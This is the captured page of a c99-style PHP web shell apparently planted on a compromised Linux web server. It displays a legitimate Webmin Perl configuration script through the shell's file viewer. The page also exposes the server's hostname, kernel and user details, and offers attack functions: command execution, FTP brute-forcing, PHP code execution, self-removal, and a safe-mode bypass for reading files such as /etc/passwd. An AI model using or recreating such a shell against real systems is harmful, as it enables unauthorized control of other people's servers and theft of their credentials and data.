!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/acl/   drwxr-xr-x
Free 50.93 GB of 127.8 GB (39.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_unix.cgi (2.01 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# edit_unix.cgi
# Save automatic unix user authentication options

require './acl-lib.pl';
&ReadParse();
&error_setup($text{'unix_err'});
$access{'unix'} && $access{'create'} && $access{'delete'} ||
    &error($text{'unix_ecannot'});

# Parse Unix auth table
if (!$in{'unix_def'}) {
    for($i=0; defined($mode = $in{"mode_$i"}); $i++) {
        next if (!$mode);
        $who = $in{"who_$i"};
        if ($mode == 2 && !$who) {
            &error(&text('unix_ewhogroup', $i+1));
            }
        elsif ($mode == 3 && !$who) {
            &error(&text('unix_ewhouser', $i+1));
            }
        $to = $in{"to_$i"};
        push(@unix, [ $mode == 1 ? "*" :
                  $mode == 2 ? "\@$who" : $who, $to ]);
        }
    @unix || &error($text{'unix_enone'});
    }

# Parse list of allowed users
@users = split(/\s+/, $in{"users"});
if ($in{"access"}) {
    foreach $u (@users) {
        if ($u =~ /^\@(\S+)$/) {
            defined(getgrnam($1)) ||
                &error(&text('unix_egroup', "$1"));
            }
        elsif ($u =~ /^(\d*)-(\d*)$/ && ($1 || $2)) {
            # Assume UIDs are ok
            }
        else {
            defined(getpwnam($u)) ||
                &error(&text('unix_euser', $u));
            }
        }
    }
if ($in{'shells_deny'}) {
    -r $in{'shells'} || &error($text{'unix_eshell'});
    }

&lock_file($ENV{'MINISERV_CONFIG'});
&get_miniserv_config(\%miniserv);
&save_unixauth(\%miniserv, \@unix);
delete($miniserv{"allowusers"});
delete($miniserv{"denyusers"});
if ($in{"access"} == 1) { $miniserv{"allowusers"} = join(' ', @users); }
elsif ($in{"access"} == 2) { $miniserv{"denyusers"} = join(' ', @users); }
if ($in{'shells_deny'}) {
    $miniserv{'shells_deny'} = $in{'shells'};
    }
else {
    delete($miniserv{'shells_deny'});
    }
if ($in{'sudo'}) {
    &has_command("sudo") || &error(&text('unix_esudo', "<tt>sudo</tt>"));
    eval "use IO::Pty";
    $@ && &error(&text('unix_esudomod', "<tt>IO::Pty</tt>"));
    }
$miniserv{'sudo'} = $in{'sudo'};
$miniserv{'pamany'} = $in{'pamany'} ? $in{'pamany_user'} : undef;
&put_miniserv_config(\%miniserv);
&unlock_file($ENV{'MINISERV_CONFIG'});
if ($oldsudo != $in{'sudo'}) {
    &restart_miniserv();
    }
else {
    &reload_miniserv();
    }
&webmin_log("unix");
&redirect("");


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]--